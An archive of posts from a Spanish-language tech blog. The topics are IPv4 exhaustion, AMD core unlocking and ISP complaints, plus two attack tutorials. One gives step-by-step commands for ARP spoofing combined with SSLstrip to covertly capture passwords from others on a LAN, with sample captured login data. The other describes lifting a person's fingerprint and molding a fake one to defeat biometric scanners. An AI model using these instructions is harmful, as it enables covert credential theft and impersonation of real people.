5.12.10

ARPAgeddon IPcalipsis o como lo quieran llamar. Se acaba el espacio en Internet?



hace rato q se habla de este tema pero siempre parecio q nunca llegaria el dia o q alguien iba a hacer algo antes de que llegara, lo cierto es que ya no quedan muchas direcciones para asignar, a este ritmo es cuestion de dias para q se acaben. en el contador de la izquierda se puede ver al ritmo q bajan y lo poco q queda disponible...

por supuesto la mayoria de los "mortales" no entiende mucho cual es el problema o si en realidad hay un problema o es otra estupidez como el y2k.



pero no, esto va a tener consecuencias... buenas y/o malas...


que es una IP?

la sigla IP (Internet Protocol) se refiere al protocolo de comunicacion principal usado en internet. para q esto funcione cada maquina (o dispositivo) debe tener una direccion (direccion IP) que es unica dentro de la red, no puede haber 2 IPs iguales ya que esto genera un error inmediatamente. digamos q es como la direccion de nuestra casa, o el numero de documento de identidad o como se llame la identificacion q usen en su pais... un numero unico.

la version q usamos desde hace casi 30 años es IPv4, en la cual este numero tiene una longitud de 32 bits, dividido en 4 segmentos de 8 bits. en decimal una tipica IP puede ser:

200.43.65.23

cada uno de los campos lo comprende un numero entre 0 y 255 o sea q la cuenta es facil 256^4 (o 2^32 binario) lo cual nos da un total de 4.294.967.296 IPs posibles. a esto le tenemos q restar unos 18 millones reservados para redes privadas y otros 270 millones para multicast.


quien asigna y quien reparte las IPs

a nosotros (el usuario final) nos da la IP nuestro proveedor de internet q tiene un numero limitado de ellas, cuando se le acaban y necesita mas las pide al RIR (Regional Internet Registrie) q le corresponde, en nuestra region esta LACNIC q cubre latinoamerica y el caribe. Existen otros 4 que son ARIN (norteamerica), AfriNIC (africa), APNIC (asia y pacifico), RIPE NCC (europa, medio este y asia central).


cuando estos necesitan mas IPs se las piden al IANA (Internet Assigned Numbers Authority), al cual le quedan las q vemos en el contador... teniendo en cuenta q la demanda actual es de unos 200 millones al año parece q estamos en 1 problema... je

de todas formas se calcula q los RIRs y los ISPs (Internet Service Provider) tienen mas de 400 millones guardadas... lo cual nos da unos 2 años mas hasta que se acaben de verdad.


celulares, 3g, 4g y toda esa porqueria

gran culpa de todo esto la tienen la gran cantidad de porquerias q ahora conectan a internet sin mucho sentido, tenemos millones de celulares, ipads y otros engendros conectando para actualizar perfiles de facebook, dejar comentarios estupidos en twitter, estar al tanto de la temperatura o ver videitos en youtube.

no seria mejor haberse planteado la real necesidad de darle una IP publica a cada uno antes de saturar todo? para q m... quiere una IP unica un telefono movil? alguien necesitaba correr un server de correo o un FTP desde el celu?

bastante mal uso hacen ya de las IPs con las conexiones hogareñas... estabamos tan tranquilos hace solo 10 años... en fin... todo sea x el "progreso" de la red...


la solucion... IPv6

IPv6 es la nueva version del Internet Protocol diseñada para usar direcciones de 128 bits en lugar de 32 lo cual nos da un limite de 2^128 o sea:

340.282.366.920.938.463.463.374.607.431.768.211.456

las direcciones IPv6 estan compuestas, a diferencia de las v4, por 8 campos de 16 bits cada uno, el numero maximo seria:

FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF (el decimal de arriba)

de estos los 1eros 64 corresponden al prefijo de red y los ultimos al identificador de la interfaz q se genera a partir de la MAC address del dispositivo conectado.

los sistemas operativos ya tienen soporte para el nuevo protocolo hace años, el tema es q la mayoria del hardware de redes de alto nivel debe ser cambiado, incluyendo tambien la mayoria de los switches hogareños. ademas de q la transicion no se puede hacer de un dia para el otro, estamos hablando de un par de años como para hacerlo de manera q no cause demasiados transtornos, habra un largo periodo en el cual conviviran ambos protocolos hasta que el 4 vaya desapareciendo poco a poco... pero deberiamos empezar ya...


especulacion?

q pasaria en 1 escenario donde no haya mas IPs? hay muchos ISPs chicos q ya usan NAT (Network Address Translation) para sacar montones de usuarios con una misma IP, como decia al principio para la mayoria de los "mortales" esto es lo mismo... hasta q quieren bajar alguna pelicula desde una pagina de descargas y les sale el tipico:

Your IP address xx.xx.xx.xx is already downloading a file. Please wait until the download is completed.

o:

Su dirección IP xx.xx.xx.xx se encuentra descargando xxxxx bytes del archivo XX. Por favor finalice esta descarga antes de iniciar otra.


o alguna parecida... esta lleno en los foros de usuarios preguntando porque les sale ese error o no pueden correr servers de juegos... o algun newbie practicando con troyanos de conexion inversa q no puede forwardear puertos. ahi tienen la respuesta, estan todos en una gran LAN (Local Area Network) barrial...

ademas, por mas q nos acostumbremos a esto y quieran explotarlo al maximo el NAT tambien tiene limite. 1 IP puede usar un maximo de 65536 (FFFFh) puertos, o sea q puede abrir ese numero de conexiones, si se superan quedan encoladas hasta q se libere alguna.

ni hablar del q quiera tener un simple FTP, o algo tan normal hoy en dia como una conexion a la pc de tu casa (hace años q no podria vivir sin ella),  pagar una ip publica va a ser como pagar ahora una conexion dedicada.

se dice q tanto los grandes operadores de usa como las organizaciones gubernamentales ya estan listas para empezar el proceso, google y facebook parecen estar tambien en el camino y en europa y asia hay algunos equipos q ya empezaron a ejecutarlo.

en latinoamerica tambien tenemos algunas redes trabajando en v6 aunque al usuario final llegan en v4. aca la lista de quienes lo tienen implementado o estan en eso a dia de hoy:


conclusion

no se... q estamos esperando? a cuanto va el contador mientras leen esto? ya llego a 0?

25.11.10

SSLSTRIP - Como conseguir cualquier password sin despertar sospechas en 1 lan.


esta tecnica fue presentada en el black hat dc 2009 por moxie marlinspike y desperto bastante revuelo, no era nuevo como ataque pero si la herramienta que lo automatiza y lo hace mucho mas facil.

pero esto es del año pasado! diran... y encima pongo q es mas viejo, como es posible entonces q siga funcionando y nadie lo parchee. muy facil, no es 1 ataque directo al ssl sino que lo q hace es reemplazar todos los links https x http seguido de 1 ataque mitm como el q vimos en este link:


de esta manera el objetivo se comunica con nosotros x http y nosotros con el servidor de destino x https, obteniendo en el proceso todas las passwords en texto plano q despues enviamos encriptadas a su destino final.

con esto salvamos el problema de certificados q tenemos usando ettercap como habiamos visto aca:


haciendo transparente el logueo para el objetivo... peligroso no?...


preparando el sistema

voy a explicarlo para debian/ubuntu, si tienen fedora o derivados cambien x yum. 1ero instalamos python y python-twisted-web:

apt-get install python python-twisted-web

despues descargamos sslstrip, pueden buscar algun link o bajarlo de la pagina del autor:

http://www.thoughtcrime.org/software/sslstrip/

podemos hacer 2 cosas, instalarlo o correrlo desde el directorio de descarga. para instalarlo:

python ./setup.py install

de esta manera queda accesible desde la consola, sino para ejecutarlo:

python sslstrip.py (opciones)


el ataque

lo 1ero es activar el reenvio de paquetes, esto lo hacemos cambiando de 0 a 1 el valor del archivo ip_forward q se encuentra en /proc/sys/net/ipv4/, editandolo o simplemente poniendo en la consola:

echo "1" > /proc/sys/net/ipv4/ip_forward

despues configuramos iptables para q reenvie el trafico a ssltrip, el puerto q queremos redirigir es el 80 hacia el 10000 q es el default del programa. si quieren usar otro puerto x alguna razon este es el momento de elegirlo, despues al lanzarlo se puede cambiar. el comando seria:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (o el q quieran)

ahora corremos sslstrip, si lo instalaron simplemente:

sslstrip -w nombrearchivo

donde "nombrearchivo" es 1 nombre para el archivo donde van a quedar logueados los datos. si cambiamos el puerto usamos el modificador -l:

sslstrip -w nombredearchivo -l numdepuerto

si todo esta bien instalado deberiamos ver esto:

sslstrip 0.6 by Moxie Marlinspike running...

ahora solo falta hacer el envenenamiento arp para q la otra maquina nos mande su trafico, podemos usar exactamente el mismo metodo de la entrada q cite antes y el resultado simplemente seria q el objetivo no tendria el famoso mensaje del certificado ya que el trafico pasaria x el puerto 80, el user/pass saldria en la pantalla inferior como cualquier pass de texto plano y a su vez se puede ver en el log de ssltrip:

2010-11-25 19:48:39,529 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%
2F%3F&service=mail&rm=false&dsh=3151454474180978812&ltmpl=default&hl=en
&ltmpl=default&scc=1&ss=1&timeStmp=&secTok=&GALX=HirBaqYb1RQ&Email=
ACA_SALE_EL_CORREO&Passwd=ACA_LA_PASSWORD&rmShown=1&signIn
=Sign+in&asts=

pero podemos hacerlo mas facil para no tener q usar ettercap simplemente instalando la suite dsniff:

apt-get install dsniff

dsniff daria como para otra entrada completa pero ahora vamos a usar solamente arpspoof para hacer el envenenamiento. despues de instalar dsniff ponemos en la consola:

arpspoof -i interface (eth0, wlan0, ath0 o la q sea) -t target (maquina objetivo) gateway (el router)

x ej:

arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

en la consola veriamos algo como esto repetirse una y otra vez:

0:5:4e:4d:15:30 0:1e:e5:fc:10:65 0806 42: arp reply 192.168.1.1 is-at 0:5:4e:4d:15:30

0:5:4e:4d:15:30 es nuestra mac, q queremos q el objetivo (0:1e:e5:fc:10:65) crea q es el router, entonces lo q le decimos es q 192.168.1.1 (el router) esta en (is-at) nuestra mac (0:5:4e:4d:15:30)

si hacemos en el objetivo 1 arp -a vamos a ver que nuestra ip y el router tienen la misma mac, el envenenamiento tuvo exito.

sslstrip ya esta capturando trafico ssl y guardandolo en el log, solo hay q abrirlo y ver q hay...



14.7.10

Como vulnerar un sistema de Biometria - Huellas dactilares - by Alesteir


este tutorial fue escrito x mi amigo Alesteir hace unos 2 años en 1 momento muy especial, en 1 foro q en su nombre lleva la palabra "hacker" pero ya no queda practicamente ninguno, si quedo mucho warez, porno y algo d offtopic.

los otros dias encontre este texto en 1 foro "administrado" x alguien q c negaba a este tipo d temas (sera xq no sabe ni usar 1 proxy xD) y ni siquiera c ponia la fuente.

no lo encontre completo (y con su fuente correspondiente) en ningun otro lado d la red y me parecio justo q tenga su lugar con el nombre d su autor bien claro.


Burlando Biometria By Alesteir

A Continuación os enseñare un método a seguir para falsear huellas dactilares o digitales (como le llaman algunos), lo cual es un método mas para vulnerar cualquier sistema basado en seguridad biométrica de huellas digitales y por ende es de aplicación neta al hacking y a los sistemas informáticos. Para poder falsificar cualquier huella necesitamos encontrar la original primero (es aca donde se puede recurrir a la ingeniería social para conseguir la huella deseada , jejejeje), además de que es necesario poder tener una buena impresión.

Es aquí donde entra el rollo de la ciencia forense. Hay que entender que las huellas estan compuestas por crestas papilares, son estas crestas -las elevaciones- y surcos (las grietas), las que le dan esa característica única a cda huella, ya que ninguna huella es igual a otra, asi sean de la misma persona, y son los distintos recovecos y formas de estos elementos, los que las hacen únicas e irrepetibles, y para hacer dictamenes se necesitan una cantidad determinada de puntos característicos coincidentes para poder dar un correcto resultado, la clasificación de estos puntos, su topografia, añadidas a otras cuestiones tecnicas son las que forman las bases de la dactiloscopia como ciencia, es por eso que se han usado y se siguen usando las huellas digitales como un método de identificación personal, es sabido que recientemente se usan en cuestiones de biometría, aplicadas a la seguridad en general), hay que tener en cuenta que es la presión ejercida (al tener contacto con superficies de distinto tipo tales como: espejos, vasos y envases, picaportes, vidrios, acetatos, pantallas de pcs y muchos objetos mas), la que determina de que una huella se imprima en una superficie, es cierto que existen otros factores mas que influyen a que una impresión sea buena o no (el polvo es una de ellas), y este es uno de los items determinantes a la hora de hacer una recolección de huellas dactilares (ojo, que las partes lisas -por lógica- son los focos mas frecuentes para encontrar buenas huellas (para clasificar una huella como buena debe verse tan siquiera un 75 % de la misma, aunque también se pueden hacer reconstrucciones a partir de fragmentos) , nunca encontraríamos una huella en una superficie rugosa y con porosidades, ya que no se tendría el suficiente contacto por parte de las crestas de la huella con la superficie. En unas imágenes que se ven mas abajo, se ve una buena impresión dactilar(después de revelada lógicamente), por lo tanto nos valdremos de objetos y elementos caseros, pero que serán efectivos a la hora de hacer una recolección, para posteriormente ser usada, he de advertir que el uso que se le de a esta información solo depende de cada cual.

El método hacer una huella visible mas usado desde hace mucho es el de aplicarle un poco de carbón en polvo (el cual lo podemos hacer con un poco de carbón vegetal –pulverizándolo y pasándolo por un cedazo, para dejarlo lo mas fino posible), otra forma es pasando la mina de un lápiz contra una lija, hasta obtener una cantidad suficiente:
A un pincel de esos que usan las mujeres para aplicarse el rímel en los pómulos (debe ser muy suave y fino) lo untamos con el polvo revelador, y lo pasamos muy suave por el lugar donde se aprecia la huella dactilar.

Otra método muy casero también pero muy efectivo es: echar unas gotas de pegante instantáneo dentro de una tapa plástica de agua mineral, y lo ponemos sobre la impresión de la forma en que se aprecia en las siguientes imágenes:





El principal ingrediente del pegante superglue produce una superficie blanca sobre la huella (mas concretamente sobre la grasa), revelándola a nuestros ojos y permitiéndonos hacer una recolección, bien sea física o de soporte fotográfico:

La siguiente parte envuelve la recolección física (En caso de que no contemos con cámara digital, pero esta parte la omito por el momento), la cual se hace con un poco de papel Contac, el proceso se hace pegando el papel sobre la impresión ya revelada, una vez la tenemos, procedemos a poner el Contac de nuevo sobre el papel blanco que lo recubre, la escaneamos y seguimos con el procedimiento para hacer el molde para hacer cuantas veces queramos nuestra huella, La clave de todo el proceso es lograr capturar o recolectar una huella fidedigna y casi exacta a la original, la cual al final es la que nos permitirá hacernos con nuestra goma o huella postiza lista para usar, para ello debemos usar un papel acetato transparente, del usado en los proyectores e imprimir las huellas con una impresora laser (es la capa que deja el toner al imprimir la clave de todo el cuento):

La impresora laser deja un pequeño pero eficiente relieve para nuestros designios que por cierto imprime la huella al revés, y como lo que necesitamos es un negativo, pues genial) esto es lo que vamos a aprovechar para crear nuestra goma:

Una vez tenemos las impresiones dactilares en el acetato procedemos a cubrir la huella con un poco de pegante para madera o Colbon que llaman:



(para hacerlo mas manejable, le agregamos un poco de glicerina)

Repartimos bien el pegante hasta formar una capa, esperamos a que se seque el pegante.

Separamos la goma seca de la hoja de acetato.

La recortamos al tamaño de nuestro dedo.

Ya para terminar con un poco de pegante natural o de teatro pegamos nuestro huella falseada a nuestro propio dedo

Listo!, ya tenemos nuestra huella trucada ¡


29.6.10

Como pagar un Phenom II x2 y tener un Phenom II x4 (Core unlocking)


a quien no le gustaria pagar casi la mitad x un micro d 4 nucleos? bueno... no es muy dificil, en la mayoria d los ultimos modelos d AMD se pueden liberar nucleos ocultos.

como a la gente le gusta cada vez mas "tocar" el hardware, los motherboards vienen con mas y mas opciones para manejar voltajes y frecuencias y eso hace q c puedan hacer cosas interesantes. lo q antes era 1 dolor d cabeza cuando teniamos q meter jumpers para configurar dmas, irqs, multiplicadores y otras porquerias, ahora aparece como opcion en casi cualquier mobo q c respete.

hace unos meses vole mi mobo asus mn2-sli deluxe... chipset... irreparable, en su momento lo pague algo asi como 250usd, no duro 3 años. conclusion despues d llevarlo a un ingeniero q fue el ultimo recurso, no comprar mobos caros, son los q mas c rompen y los q menos c pueden reparar, un asus standard es suficiente. entonces fui y compre un modesto M4A785-M.

tenia 1 athlonX2 5600 q d paso decidi cambiar, las opciones estaban entre un phenomII x3 o x4. el x4 era el 920 y el x3 720 pero "black edition", entre otras cosas es altamente overclockeable y la diferencia d precio era mucha asi q fui x el ultimo.

... suerte q compre s xq ahora es 920, y lastima q no compre el x2 550 o 555 xq hubiera sido lo mismo pero mas barato todavia xD


binning

"binning" es el proceso q hace el fabricante para testear los chips y asignarlos segun los resultados a la linea d productos q le corresponde. los chips q soportan altas velocidades con todos sus cores funcionando a la perfeccion van a la linea d punta, los q fallan c van asignando a velocidades a las q c comportan d manera estable y del mismo modo c desactivan los cores q presentan fallas.

esto x supuesto no es tan asi, cuando c lanza una nueva linea hay muchos fallos en la produccion q despues c van corrigiendo hasta q 1 porcentaje muy bajo presenta fallas. como todos los micros son fabricados con 4 nucleos llega un momento q por razones d mercado hay q desactivar si o si algunos para vender los x2 y x3... no todo el mundo (como yo) quiere gastar lo q vale el x4.

en la foto d arriba c pueden apreciar perfectamente los 4 nucleos en el 550.


AMD

en realidad AMD nunca tuvo una posicion demasiado clara sobre el tema, x 1 lado c beneficia con las ventas ya q mucha gente compra x2 y x3 ya q termina siendo una alternativa baratisima frente al quad-core d intel q cuesta una fortuna. x otro lado c hablo en 1 momento d q estaban forzando a algunos fabricantes d mobos a blockear la opcion en futuras actualizaciones d bios, cosa q parece q no paso con asus xq el mio tiene bios d enero d este año y desblockeo sin problemas.

c hacen cargo d todo el tema y x supuesto no ofrecen ningun soporte ante fallas en el desblockeo, si ellos lo blockearon x algo sera ;)


tambien puede no funcionar...

antes del proceso aviso q esta la posibilidad d q realmente tengan 1 o 2 cores dañados, la verdad q me parece bastante remota si es nuevo xq antes q el mio probe algunos y todos funcionaron, pero puede pasar.

el problema mas grave es q no bootee la maquina al hacer el cambio, ante esto con 1 simple reset d bios alcanza para tenerla otra vez funcionando, tengan a mano el manual del mobo x las dudas...

tambien puede arrancar y despues ser inestable, aca ya entramos en otro terreno. tal vez c pueda llegar a estabilizar subiendo el voltaje al micro pero no recomiendo tocar esas cosas si no saben lo q estan haciendo. el sintoma son cuelgues, pantallas azules en win, etc. en 1 palabra... inestabilidad.


motherboard

el mobo tiene q soportar la opcion ACC (Automatic Clock Calibration) o NCC (NVidia Clock Calibration) q es la respuesta de nVidia a esta nueva "moda". hay distintos modelos d chipsets q lo permiten segun la marca yendo desde precios economicos hasta la alta gama. busquen la opcion en el bios, o si van a comprar haciendo una busqueda en google c pueden checkear los modelos con soporte.

esta es 1 pequeña lista d mobos en los que se llevo a cabo el proceso con exito:



Asus

GeForce 8300
M4N78 Pro - 1004 Official Bios

nForce 980a SLI
M4N82 Deluxe - 0906 Official Bios

770G/SB710
M4A77TD PRO - 1007/0316 Official Bios

785G/SB710
M4A785D-M PRO - 405 Official Bios
M4A785M - 0503 Official Bios

785G/SB750
M4A785TD-V EVO - 0410/0602 Official Bios

790X/SB750
M4A79XTD EVO - 0605/0704 Official Bios

790FX/SB750
M3A79-T Deluxe – 0030 Mod Bios
M4A79 Deluxe – 1602 Official Bios
M4A79T Deluxe – 0079 Mod Bios/1801 Official Bios
Crosshair III Formula - 0702 / 1003

790GX/SB750
M3A78-T – 0023 Mod Bios
M4A78-E – 1204/1803 Official Bios
M4A78-E SE – 0023 Mod Bios
M4A78T-E – 1402 Official Bios

890GX/SB850
M4A89GTD-PRO/USB3 - 0307 Official Bios


Asrock

780G/SB710
A780GMH/128M - 1.50 Bios

785G/SB750
A785GMH/128M - 1.00 Bios

790GX/SB750
AOD790GX/128M – 1.40 Bios
A790GMH/128M - 1.20 Bios
A790GXH/128M – 1.20 Bios
A790GX/128M - ???


Biostar

785G/SB710
TA785GE 128m - 88GCO720CE Mod Bios

790GX/SB750
TA790GXBE
TA790GX A3+ - 78DAA616 Mod bios
TA790GX 128M – 78DEA113 Official bios
TA790GX3 A2+ - A78DA113
TA790GX A2+ - 78DBA113 Official bios - SUCCESS!!


DFI

790FX/SB750
DK 790FXB-M3H5 – 04/02/2009 Bios
DK 790FXB-M2RSH – 03/10/2009 Bios
DK 790FXB-M2RS - 02/24/2009 Bios

790GX/SB750
JR 790GX-M2RS – 10/30/2008 Bios – SUCCESS!!


Gigabyte

nForce 720D
GA-M720-US3 - F4 Bios

760G/SB710
GA-MA78LM-S2 - F1 Bios

770X/SB710
GA-770TA-UD3 - F1 Bios
GA-MA770T-UD3P - F2c/F3 Bios

785G/SB710
GA-MA785GM-US2H - F5 bios
GA-MA785GMT-UD2H - F3/F5 Bios

785GX/SB750
GA-MA785G-UD3H - F1/F5b Bios
GA-MA785GT-UD3H - F4/F5a Bios
GA-785GMT-USB3 - F1 Bios

790X/SB750
GA-MA790X-UD3P - F4 Bios
GA-MA790X-UD4 – F3 Bios
GA-MA790X-UD4P – F5/F7/F9 Bios
GA-MA790XT-UD4P - F4G/F5/F6/F7 Bios

790FX/SB750
GA-MA790FX-UD5P - F4c Bios
GA-MA790FXT-UD5P – F3b/F5 Bios

790GX/SB750
GA-MA790GP-DS4H – F3h Bios
GA-MA790GP-UD3H - F1 Bios
GA-MA790GP-UD4H – F3h Bios
GA-MA790GPT-UD3H - F2 Bios


MSI

770X/SB710
770-C45 – 1.3 Offical Bios/1.3B2 Special Bios/10.2

785G/SB710
785GT-E63 - 28.0 08/13/2009 Bios
785GTM-E45 - 8.0 09/07/2009 Bios
785GM-E65 - 2.3 Official Bios

790FX/SB750
790FX-GD70 – 1.5B1/1.5B2/1.5B3/1.7 Bios

790GX/SB750
790GX-G65 – 1.4B2 Special Bios
DKA790GX - 1.8 Bios for Platinum version of mobo
DKA790GX Platinum – 1.9b2 Bios

KA790GX - No funciona
KA790GX-M - No funciona

estos 2 ultimos mobos a pesar d tener el southbridge sb750 q es capaz d desbloquear tienen la opcion anulada.


micro

el micro depende d lo q quieran gastar y lo q quieran tener, los phenomII x2 y x3 son desbloqueables a x4 y los x4 con un poco d suerte a x6. para los q quieran gastar menos los sempron tambien son desbloqueables, x ej el sempron 140 c puede llevar a athlonII X2.

para comprar yo compraria un x2 550 o 555 black edition por la relacion calidad/precio. hay q tener en cuenta q esta edicion esta hecha para soportar overclocking y x lo tanto es mas estable q uno comun, 130usd aprox me parece un muy buen precio x 4 nucleos.


el proceso

el proceso es el mas sencillo del mundo, solo hay q buscar la opcion en el bios y ponerla en auto. en el caso del M4A785-M fui a "advanced" y dentro d la conf del micro a:

ADVANCED CLOCK CALIBRATION -> AUTO

con esto c abrio otra opcion llamada "unleashing mode", tambien la active:

UNLEASING MODE -> ENABLED

y despues aparecio donde pregunta si c quieren usar 3 o 4 cores:


ACTIVE CPU CORES -> 4 CORE OPERATION


al reiniciar me salio el msg "4 cores are activated" y despues d unas horas d test parece q todo esta ok.


ANTES


DESPUES


no c fijen en las velocidades y el multiplicador, esta activado cool&quiet como c puede ver x las diferencias d voltaje y eso hace q cambien segun el requerimiento del sistema.

ahhh.... y 1 vez mas, gracias amd!! ;)

6.6.10

Fibertel, Speedy y Telecentro (Argentina) - Como hacer para que no nos roben tanto los proveedores de internet.

es 1 realidad no solo en argentina sino en la mayoria d los paises q los proveedores d internet, a los cuales llamaremos ISP (Internet Service Provider) d ahora en adelante, no dan el servicio d deberian. a mucha gente no le importa lo mas minimo mientras puedan usar el msn y no tarden mucho en subir sus fotos a facebook, tal vez el problema mayor empieza cuando c cuelgan los videos d youtube... je

lo cierto es q la velocidad casi nunca es la q deberia ser (sobre todo en horarios pico) y q si pagamos x 1 servicio eso es lo q deberiamos recibir exactamente, mas alla d q el msn funcione o no. tambien estan los problemas d cortes d servicio, desconexiones, mala calidad, etc, pero eso ya es otra historia.

solamente voy a hablar d los 3 isp del titulo xq son los q tuve mas experiencia directa, los demas tienen sus cosas tambien pero no voy a hablar x boca d 3eros sino x experiencia propia. podria agregar a telmex, pero solo conozco los servicios corporativos. como comentario, no funciona mal, pero los dias d tormenta olvidense d la conexion...


Precios

los precios obviamente estan infladisimos, piden cerca d 140 o 150$ argentinos (casi 40usd) x una conexion d 3mbps. eso x supuesto "sin promocion" o "despues d terminada la misma". Todos los ISP dan promociones x 6 meses a mitad d precio y despues empiezan a cobrar el monto total.

la mayoria sabemos (o quiero pensar q la mayoria) q si estamos en una zona donde podemos elegir, simplemente aceptamos la promocion y en el ultimo mes pedimos la baja, con lo cual nos llama atentamente nuestro ISP unos dias antes d finalizar y nos ofrece una nueva promo, tal vez mas jugosa q la anterior. garantizo q lo hacen, sino saben q lo unico q tenemos q hacer es cambiar d proveedor x 6 meses y despues volver con otra promo.

al darse cuenta d la situacion simplemente la extienden. en fiber es automatico despues d 1 par d veces d amenazar con la baja, directamente al finalizar extienden la promo x 6 meses o 1 año. pero si nadie dice nada ni amenaza con irse x supuesto q pasan a cobrar el precio full.

x ej en fibertel estuve pagando durante casi 2 años la mitad del precio (unos 60$), cuando hace unas semanas pedi la baja x enesima vez (pero ahora d verdad) me llegaron a ofrecer cable mas 3mbps a 150$ final. asumiendo q el cable cuesta unos 120$, la conexion d 3mbps me la estarian cobrando 30$??? xD


Velocidad

el tema d la velocidad varia en cuanto a zonas pero aun pudiendo tener una buena conexion por nuestra situacion geografica, es posible llegar a tener una malisima si no la checkeamos. cuando fiber subio la velocidad d 1 a 3mbps funcionaba peor q antes. esa fue una d mis 1eras peleas con ellos q termino en 1 año a 50$.

este problema es mucho mas dificil d solucionar q el del dinero ya q para la mayoria d los "mortales" es 1 misterio como funciona internet y como saber cuanta velocidad tiene y cuanta deberia tener, y x supuesto los isp tratan d mantener este "misterio" todo lo q pueden hablando a los "profanos" con terminos q dan risa sobre problemas q dan todavia mas. la placa d red, virus, el cableado, rayos cosmicos... cualquier causa es buena para confundir al usuario y q no moleste mas x un rato.

ojo... esto no quiere decir q estos problemas no puedan existir (salvo x los rayos cosmicos), pero el 99% d las veces el problema es d ellos.

tenemos 2 tipos d conexiones diferentes entre estos proveedores, speedy es adsl y fiber y telecentro cable, el adsl corre x la linea telefonica y el cable como es obvio x la red q le corresponde. la gran diferencia entre estos 2 servicios es q el adsl tiene una conexion punto a punto hacia la central y el cable no, el cable conecta x sectores a un nodo en comun, lo q hace q si hay muchas maquinas conectadas a s nodo c sature, como pasa en muchos lugares en el caso d telecentro, q es donde mas se puede apreciar el problema.

en este caso tenemos q lograr 1ero la velocidad prometida dentro del nodo para tener una remota posibilidad d tenerla despues hacia internet, si no la tenemos c crea el tipico "cuello d botella". todo esto c puede medir, c puede reclamar y llegado el punto c puede denunciar... o cuando menos usar para q nos arreglen el servicio o nos den algun "beneficio extra" en pago x las molestias.


Speedy

Personalmente con speedy fue con los q menos problemas tuve, tal vez xq fue d los 1eros y xq tenia conocidos en la empresa... je. El problema mayormente es el soporte, cuando funciona bien x lo gral queda asi y todo oka, el tema es lograr q alguien nos atienda si tenemos problemas.

speedy es d telefonica, telefonica ya todos sabemos lo burocratica q puede llegar a ser, llegue a hacerles denuncia en la CNC (Comision Nacional de Comunicaciones) para q muden mi linea d telefono a 2 cuadras d distancia despues d 7 meses!?!?...

con speedy es mas o menos lo mismo, si les funciona bien... recen para q siga asi y si no tienen otro proveedor en su zona... recen para q aunque sea funcione. speedy llega a muchos lugares donde no llega otro proveedor y esos usuarios son los q tienen los peores problemas, tipico d cualquier monopolio.

speedy nos proporciona 1 test d velocidad en su pagina, no es confiable pero es el 1er paso al hacer 1 reclamo, la "boca d la botella", si la conexion en s test no mide lo q tiene q medir nunca lo va a hacer contra 1 server real cuando quieran bajar algo.

si tienen speedy pueden checkear el 1er tramo d su conexion aca:

www.speedy.com.ar/medidor-de-velocidad/

mas adelante 1 test confiable para todos...


Fibertel

Con fibertel es mas o menos lo mismo, si haces q funcione bien no tenes mas problemas, pero para eso tenes q hacer 200 reclamos, anotarte todos los numeritos, pedir la baja y recien ahi t va a llamar alguien ofreciendo lo q quieras.

los del soporte no entienden nada la mayoria (como d costumbre), creo q hable con casi todos. a uno c le escapo una d las 1eras veces q llame la pagina d testeo, digo "c le escapo" xq despues extrañamente nadie me "invitaba" a hacer 1 test d velocidad, entonces les decia q "en una llamada anterior me pasaron esta pagina" y al mostrarles los resultados no podian inventar mucho.

la web para checkear la velocidad de fiber es esta:

http://sps.fibertel.com.ar/

si vamos a:

pruebas d velocidad -> download

encontramos 2 tipos d descargas, nacional e internacional. esto es muy bueno xq podemos mediante su propio test checkear tanto en servidores propios d fibertel como en servidores externos. x lo gral la descarga nacional es perfecta y el problema esta con la internacional, a pesar d ser cable fiber tiene mejor estructura q telecentro y no hay tanta saturacion en los nodos, igualmente 1ero es bueno checkear la nacional.

la internacional va cambiando periodicamente, pero x lo gral no tengo quejas, son servers normales d internet desde donde tranquilamente c podria estar descargando algo. en este momento la descarga 3 es 1 rpm del wireshark xD... andaran en cosas raras estos chicos? je

si la descarga no va a la velocidad q deberia o cerca, llamen, pidan 1 num d caso d soporte y anotenlos todos.

otro tema q daria mucho para hablar sobre fiber es el conocido blockeo d puertos. muchas cosas estan blockeadas, no llegue nunca a saber cuantas exactamente pero son bastantes. para un user normal no tiene mucha importancia, para uno avanzado puede llegar a traer bastantes problemas y en todo caso me parece una invasion a la conexion.

si yo quiero tener una casa con 3 puertas y viene el estado y me pone pared en 2 diciendo q necesito 1 sola y q asi es mas seguro... deberia dejar q lo haga? o deberia encargarme yo d decidir cuantas puertas quiero? ademas... no deberian x lo menos avisarme q estan clausurando mis puertas?


Telecentro

telecentro... telecentro... si, cai en la trampa d telecentro, como dije antes estoy en 1 zona con muchos isp y me gusta probar. cable digital, internet 3mbps y telefonia ip a 160$... barato no? xD

con la telefonia no tenia muchas esperanzas, c corta todo el tiempo, da ocupado, si le pongo el inalambrico hace 1 ruido terrible y no es el trafo, ni la linea d corriente, ni el cable, ni "ponele 1 filtro d rf", ni nada q c pueda calificar d "normal". el soporte dice "sr, es el telefono obviamente" a lo cual respondo "en este momento t hablo desde s telefono pero desde 1 linea tradicional y funciona perfecto"... silencio... me recomienda poner otro filtro... cruzamos un par d frases forzadas y le corto.

el dia d la instalacion cuando ponen el modem checkeo velocidad contra telecentro, todo ok, contra 1 servidor en usa, todo ok, europa, todo oka, firmo contento y creo q esta todo bien... gran error.

ya venia el fin d semana y no tuve mucha oportunidad d usar la conexion, a la semana siguiente x la tarde me parecio notarla lenta, checkeo y no llegaba al mega. al principio crei q me habian cambiado a 1mbps, despues me di cuenta q era problema d saturacion cuando c libero despues d las 12 d la noche.

la mayoria d los isps ante 1 problema asi alegan cualquier cosa (como rayos cosmicos) pero telecentro tiene el descaro d hacerse cargo, ante 1 correo al sopote (cansado d esperar q me atiendan x tel) con capturas d pantalla d las mediciones y 1 completa descripcion del problema me respondieron lo siguiente:

Estimado Sr.
Le informamos que gracias a su reclamo, y sumados a otros, se están preparando tareas abocándose al desperfecto que provoca fluctuación del ancho de banda en determinadas franjas horarias. Pedimos disculpas por el inconveniente. Esta información fue sacada gracias al RA XXXXXX.
Desde ya, muchas gracias.
Buenas días.


Departamento de Soporte Técnico
Telecentro S.A.
soporte@telecentro.net.ar
www.telecentro.com.ar
6380-9500


o sea... traducido:

Estimado Estafado.

Le informamos q su conexion nunca va a funcionar a lo q ud paga dado q no tenemos la estructura necesaria para el numero d clientes q poseemos. Seguiremos sumando clientes para tratar d pagar una estructura q cada vez queda mas chica.
Buenas? dias.


